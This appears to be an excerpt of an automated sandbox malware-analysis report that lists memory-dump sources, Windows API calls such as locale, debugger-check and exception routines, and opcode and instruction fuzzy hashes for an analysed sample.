                                                              • Source File: 00000000.00000003.2552168143.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_3_5c90000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 161cc518dd5fea804cf171886f72e2fd5bf86672bad3717694720db40b26f878
                                                              • Instruction ID: 2855997e0794d7df835d7c95b21e7303b4529e5cb7a1e1f10f8b8466493d7b6f
                                                              • Opcode Fuzzy Hash: 161cc518dd5fea804cf171886f72e2fd5bf86672bad3717694720db40b26f878
                                                              • Instruction Fuzzy Hash: 87C0122A91C7C06BDF0B8A30082A0627F720A4312170980EBC0C6C9053CC140098C357
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000003.2552168143.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_3_5c90000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b88eb3ff5e1126016a0e678bb289ea611cbdea09920dc95fa0126a278247c93a
                                                              • Instruction ID: 1af45307b56a8df1f4a450c910a7b89e627f1feb391aadcae44648e094833a37
                                                              • Opcode Fuzzy Hash: b88eb3ff5e1126016a0e678bb289ea611cbdea09920dc95fa0126a278247c93a
                                                              • Instruction Fuzzy Hash: 4FC04C3464470447CE0877B5E52D4283BA9ABC4A153114478EA0793754DD696C408556
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000003.2552168143.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_3_5c90000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: bc75ddede480649533d944621e81a104627264fd70a3423ee76cda2ee83d90b9
                                                              • Instruction ID: 89c82fd20b1948fe69e938ee5a0591a09b617e1db940a8f91bd33452edf0e33a
                                                              • Opcode Fuzzy Hash: bc75ddede480649533d944621e81a104627264fd70a3423ee76cda2ee83d90b9
                                                              • Instruction Fuzzy Hash: 45B0923808530ECFC2086F79A4058247B69AB8920938004E9E54E0A3928E76E841CA45
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000003.2552168143.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_3_5c90000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ba70317f5526f315b5f8e53bb58638f562abdc9a8a2f1fbc98af54a18e9a1fd5
                                                              • Instruction ID: d644812902cc2194720b21bc63359efaf87413b4a5fefc8a009a0be737623e5e
                                                              • Opcode Fuzzy Hash: ba70317f5526f315b5f8e53bb58638f562abdc9a8a2f1fbc98af54a18e9a1fd5
                                                              • Instruction Fuzzy Hash: 40A00236E1C5E567BF4EDE375A5F53F6A3357C1605304C86E6243C0544CDB454419604
                                                              APIs
                                                                • Part of subcall function 005F642F: GetLastError.KERNEL32(00000000,?,005FC60C), ref: 005F6433
                                                                • Part of subcall function 005F642F: SetLastError.KERNEL32(00000000,00000000,?,00000006,000000FF), ref: 005F64D5
                                                              • GetACP.KERNEL32(?,?,?,?,?,?,005F4239,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 006019B6
                                                              • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,005F4239,?,?,?,00000055,?,-00000050,?,?), ref: 006019ED
                                                              • _wcschr.LIBVCRUNTIME ref: 00601A81
                                                              • _wcschr.LIBVCRUNTIME ref: 00601A8F
                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 00601B50
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
                                                              • String ID: utf8
                                                              • API String ID: 4147378913-905460609
                                                              • Opcode ID: af302935b80df9c9a2f058be6853b4f06efa18cfbe5af4b516383de1e25cb7f4
                                                              • Instruction ID: fff55ee18260e0688042a93d6f7287622bd8d3ffde967d3ac4d6d933784f2efc
                                                              • Opcode Fuzzy Hash: af302935b80df9c9a2f058be6853b4f06efa18cfbe5af4b516383de1e25cb7f4
                                                              • Instruction Fuzzy Hash: A771F671681606AADB2CAB74CC96BFB73AAFF46700F10052AF605DF2C1FB7499408765
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: __floor_pentium4
                                                              • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                              • API String ID: 4168288129-2761157908
                                                              • Opcode ID: 521076089cb4440f6a0b3b7eb04aaa6a4952ae55f24209473d54de9b93759395
                                                              • Instruction ID: e5ccde2d5bd3c459ff7ef980609853cd1cec2446c8d9619fe36a257c40d60129
                                                              • Opcode Fuzzy Hash: 521076089cb4440f6a0b3b7eb04aaa6a4952ae55f24209473d54de9b93759395
                                                              • Instruction Fuzzy Hash: 29D23CB1E485298FDB68CE24CC447EAB7BAEB44305F1445EAD54DE7280EB75AE818F40
                                                              APIs
                                                              • GetLocaleInfoW.KERNEL32(00000000,2000000B,006023A2,00000002,00000000,?,?,?,006023A2,?,00000000), ref: 00602129
                                                              • GetLocaleInfoW.KERNEL32(00000000,20001004,006023A2,00000002,00000000,?,?,?,006023A2,?,00000000), ref: 00602152
                                                              • GetACP.KERNEL32(?,?,006023A2,?,00000000), ref: 00602167
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: InfoLocale
                                                              • String ID: ACP$OCP
                                                              • API String ID: 2299586839-711371036
                                                              • Opcode ID: 24e827d3273f45b7b8b6c58a7e16dd7cb1fb561fe3b154844f4dcc7a304ab3d2
                                                              • Instruction ID: 9aa40adbe9a9ea4b538de09b19b021f34bd07abaeff8936e8e89fb2b2be2a5cd
                                                              • Opcode Fuzzy Hash: 24e827d3273f45b7b8b6c58a7e16dd7cb1fb561fe3b154844f4dcc7a304ab3d2
                                                              • Instruction Fuzzy Hash: 7A21A132780206A6DB3C8F14CD6DAD773A7AF54B54B5684A4EB0AD7390E732DD81C350
                                                              APIs
                                                                • Part of subcall function 005F642F: GetLastError.KERNEL32(00000000,?,005FC60C), ref: 005F6433
                                                                • Part of subcall function 005F642F: SetLastError.KERNEL32(00000000,00000000,?,00000006,000000FF), ref: 005F64D5
                                                              • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 00602374
                                                              • IsValidCodePage.KERNEL32(00000000), ref: 006023B2
                                                              • IsValidLocale.KERNEL32(?,00000001), ref: 006023C5
                                                              • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 0060240D
                                                              • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00602428
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                              • String ID:
                                                              • API String ID: 415426439-0
                                                              • Opcode ID: 7790d5b580370f10a87637d721b8f949cc8d3097e701c5d7a73f2f4e135a5735
                                                              • Instruction ID: 326257ad0c78d58d7291cead926f80967fb083787733e16ba049169aa65b3b45
                                                              • Opcode Fuzzy Hash: 7790d5b580370f10a87637d721b8f949cc8d3097e701c5d7a73f2f4e135a5735
                                                              • Instruction Fuzzy Hash: 72519171A8020AABDB18DFA4CC99AFF77BAFF04700F144469E501EB2D1E774D9408B61
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c3187e9c7bbb624a67166fa6f06a2419e7bfe36684c1c794ff809602c00b74b1
                                                              • Instruction ID: 14c4e1f3cd999a8467e0ec8ce059a77605a35eb713cac7314520aff4f3baaa64
                                                              • Opcode Fuzzy Hash: c3187e9c7bbb624a67166fa6f06a2419e7bfe36684c1c794ff809602c00b74b1
                                                              • Instruction Fuzzy Hash: C2023DB5E012199BDF14CFA9C8846AEFBF1FF48314F248269D619EB381D735A941CB90
                                                              APIs
                                                              • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 005EA523
                                                              • IsDebuggerPresent.KERNEL32 ref: 005EA5EF
                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 005EA60F
                                                              • UnhandledExceptionFilter.KERNEL32(?), ref: 005EA619
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                              • String ID:
                                                              • API String ID: 254469556-0
                                                              • Opcode ID: cd90936d8a0b1188aeac6fbce6a40717ad9891b3aef8d290c5d06c1f1f5754f1
                                                              • Instruction ID: d7f53c38488a1618d6ea38033d30754b68cfd756cb8c4b6a3289c61f9dcf5289
                                                              • Opcode Fuzzy Hash: cd90936d8a0b1188aeac6fbce6a40717ad9891b3aef8d290c5d06c1f1f5754f1
                                                              • Instruction Fuzzy Hash: E53138B5D4125D9BDB10DFA1D9897CDBBB8FF08300F1040AAE44DAB250EB719A85CF55
                                                              APIs
                                                                • Part of subcall function 005F642F: GetLastError.KERNEL32(00000000,?,005FC60C), ref: 005F6433
                                                                • Part of subcall function 005F642F: SetLastError.KERNEL32(00000000,00000000,?,00000006,000000FF), ref: 005F64D5
                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00601D68
                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00601DB2
                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00601E78
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: InfoLocale$ErrorLast
                                                              • String ID:
                                                              • API String ID: 661929714-0
                                                              • Opcode ID: 3eb368c4c1abb9a9a3e9005d9c506deafda0a1c16f45cea3d32a3051edeb0ed7
                                                              • Instruction ID: f650e67492d48bbe7353b34562f87c160b34d9eb41ba773cc9a7ff9b2783fb70
                                                              • Opcode Fuzzy Hash: 3eb368c4c1abb9a9a3e9005d9c506deafda0a1c16f45cea3d32a3051edeb0ed7
                                                              • Instruction Fuzzy Hash: 47618C715902079FDB28AF24CD86BABB7BAFF45300F1040A9EE05CA2D5E734E981CB50
                                                              APIs
                                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,005E112E), ref: 005F1339
                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,005E112E), ref: 005F1343
                                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,005E112E), ref: 005F1350
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                              • String ID:
                                                              • API String ID: 3906539128-0
                                                              • Opcode ID: fae35ebe87516e02c0f0bf487ac7506629a6c036fab7dd0aa9bbd0b92e43d1b0
                                                              • Instruction ID: 8b60ec8aba18d19e0b1699fcbdd809059dfaa92815d2c67c734a72e551630106
                                                              • Opcode Fuzzy Hash: fae35ebe87516e02c0f0bf487ac7506629a6c036fab7dd0aa9bbd0b92e43d1b0
                                                              • Instruction Fuzzy Hash: 6831D474D0122D9BCB21DF25D888BDDBBB4BF48310F5041EAE40CA7291E7349B858F55
                                                              APIs
                                                                • Part of subcall function 005F642F: GetLastError.KERNEL32(00000000,?,005FC60C), ref: 005F6433
                                                                • Part of subcall function 005F642F: SetLastError.KERNEL32(00000000,00000000,?,00000006,000000FF), ref: 005F64D5
                                                              • EnumSystemLocalesW.KERNEL32(00601D14,00000001,00000000,?,-00000050,?,00602348,00000000,?,?,?,00000055,?), ref: 00601C60
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$EnumLocalesSystem
                                                              • String ID: H#`
                                                              • API String ID: 2417226690-1926435667
                                                              • Opcode ID: 66a4a9577d6f6110711b6ed644c5a9cc32635f53555ab9bfbe35c814850fb329
                                                              • Instruction ID: e17e720f5634edd069e25217df66857c32ef55130284c95c685c06b29053747b
                                                              • Opcode Fuzzy Hash: 66a4a9577d6f6110711b6ed644c5a9cc32635f53555ab9bfbe35c814850fb329
                                                              • Instruction Fuzzy Hash: B61129362403055FEB1C9F38C8916BBBB93FF81358B14442CE5464B780D375A942C740
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000003.2552254239.00000000036C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_3_36c0000_LisectAVT_2403002B_185.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @
                                                              • API String ID: 0-2766056989
                                                              • Opcode ID: 82f163e4761bd8698f5f866852cd4e0229762b1cc4392098708726b2277ebcfa
                                                              • Instruction ID: a96c6e2abe1997f3409c524aa128d8bb17d37e38c9f72903ed1f925a0939084b
                                                              • Opcode Fuzzy Hash: 82f163e4761bd8698f5f866852cd4e0229762b1cc4392098708726b2277ebcfa
                                                              • Instruction Fuzzy Hash: B072A830628B888FDB69DF28C8856B9B7E5FB98310F58462DD89BC7241DF34E542CB45
                                                              APIs
                                                              • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,005FC9D8,?,?,00000008,?,?,00606395,00000000), ref: 005FCC0A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: ExceptionRaise
                                                              • String ID:
                                                              • API String ID: 3997070919-0
                                                              • Opcode ID: 9e3122275854078bbe7967ccf08daa5a8d74791b1c78a34b97617a48ced50947
                                                              • Instruction ID: f3c6d7a9173701ac86fe68d99b06a0bba0e5fd8b20dc04c2313261e083abb295
                                                              • Opcode Fuzzy Hash: 9e3122275854078bbe7967ccf08daa5a8d74791b1c78a34b97617a48ced50947
                                                              • Instruction Fuzzy Hash: EEB1493561060D9FD715CF28C58AB657FA0FF05364F258668EAAACF2A1C339E981CB40
                                                              APIs
                                                              • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 005EA79B
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: FeaturePresentProcessor
                                                              • String ID:
                                                              • API String ID: 2325560087-0
                                                              • Opcode ID: a0feca9874ff3fa13470dca4c6338b0a688f82049df2d31006e61530d5c30251
                                                              • Instruction ID: 4da564a15bf4796c1e2c4a277a089605fb6f45cca8b71acf434532ef8e2799bd
                                                              • Opcode Fuzzy Hash: a0feca9874ff3fa13470dca4c6338b0a688f82049df2d31006e61530d5c30251
                                                              • Instruction Fuzzy Hash: 22518CB1D142458FDB18CF76E8917AABBF1FB48311F18C56AC885EB250E774A901CF61
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: fd4894ceb0907154c0860a953916034d44d01c8f57b370f8ad8c6a0665b1ea58
                                                              • Instruction ID: a6604c6a428addedd6e5a1b9dc47e0cfff1ebaef6abb20c8175ff00c0fad71bc
                                                              • Opcode Fuzzy Hash: fd4894ceb0907154c0860a953916034d44d01c8f57b370f8ad8c6a0665b1ea58
                                                              • Instruction Fuzzy Hash: 764194B580421DAFDB24DF69CC89ABABBB9BF45300F1442DDE509D3211DA349E448F50
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 0
                                                              • API String ID: 0-4108050209
                                                              • Opcode ID: 6836d3c767e0b425f26eb921c8c3b68b9a3390701c2a5a682394b5213d252b74
                                                              • Instruction ID: 554802ec7b036f3bf3ffbde79ff0e845150c286f4466335a0e972f30358ed04a
                                                              • Opcode Fuzzy Hash: 6836d3c767e0b425f26eb921c8c3b68b9a3390701c2a5a682394b5213d252b74
                                                              • Instruction Fuzzy Hash: 69C1273050068BCFCB28CF69C988A7ABFB5BF46304F185629D5E697692CB35ED05CB10
                                                              APIs
                                                                • Part of subcall function 005F642F: GetLastError.KERNEL32(00000000,?,005FC60C), ref: 005F6433
                                                                • Part of subcall function 005F642F: SetLastError.KERNEL32(00000000,00000000,?,00000006,000000FF), ref: 005F64D5
                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00601FBB
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$InfoLocale
                                                              • String ID:
                                                              • API String ID: 3736152602-0
                                                              • Opcode ID: 7d29714b01414c7deea62cca7d4f76fb4adeb9c7694a0229f906aff0a6486bf1
                                                              • Instruction ID: b564f0a3f4407278effd7aec16f0a608ddf341f535c8e86d7f1bb258ddb63a24
                                                              • Opcode Fuzzy Hash: 7d29714b01414c7deea62cca7d4f76fb4adeb9c7694a0229f906aff0a6486bf1
                                                              • Instruction Fuzzy Hash: 2C21B671590207ABDB2CAA24DC59ABB77A9FF44304F10407AFE06D7281EB34AD44C750
                                                              APIs
                                                                • Part of subcall function 005F642F: GetLastError.KERNEL32(00000000,?,005FC60C), ref: 005F6433
                                                                • Part of subcall function 005F642F: SetLastError.KERNEL32(00000000,00000000,?,00000006,000000FF), ref: 005F64D5
                                                              • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00601F30,00000000,00000000,?), ref: 006021C2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$InfoLocale
                                                              • String ID:
                                                              • API String ID: 3736152602-0
                                                              • Opcode ID: e8d3bff2517a5290d566a061d7e09ffe6f666a1a10c4c31bc498a43831410d9c
                                                              • Instruction ID: c7565ecfac8036005211b80a5def591327c76c3cb0d00966f4164c819ee60f00
                                                              • Opcode Fuzzy Hash: e8d3bff2517a5290d566a061d7e09ffe6f666a1a10c4c31bc498a43831410d9c
                                                              • Instruction Fuzzy Hash: 8401D632680117ABDB1C5AA4C8AEBFB776AEF40354F154468ED12A32C1EA34FF41C690
                                                              APIs
                                                                • Part of subcall function 005F642F: GetLastError.KERNEL32(00000000,?,005FC60C), ref: 005F6433
                                                                • Part of subcall function 005F642F: SetLastError.KERNEL32(00000000,00000000,?,00000006,000000FF), ref: 005F64D5
                                                              • EnumSystemLocalesW.KERNEL32(00601F67,00000001,00000000,?,-00000050,?,00602310,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 00601CD3
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
